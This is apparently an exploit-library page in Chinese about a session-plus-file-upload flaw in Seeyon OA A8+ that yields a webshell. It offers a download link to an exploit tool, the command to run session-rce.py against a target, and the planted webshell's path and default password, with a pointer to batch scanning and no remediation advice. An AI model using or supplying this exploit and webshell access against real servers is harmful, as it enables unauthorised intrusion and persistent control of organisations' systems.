Seeyon-致远OA Session-任意文件上传

## 漏洞概述

致远OA通过发送特殊请求获取session,通过文件上传接口上传压缩包解压后可Getshell

## 影响范围

“`http
A8+
“`

## POC

大宝剑可批量扫描此漏洞,有误报性,配合EXP验证

## EXP

[点我下载](/Gr33kLibrary/download_tool/50/)

“`bash
#脚本在此目录下
python session-rce.py http://192.168.1.100
“`

“`http
Shell地址:/seeyon/common/designer/pageLayout/a234.jspx
默认密码:rebeyond
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容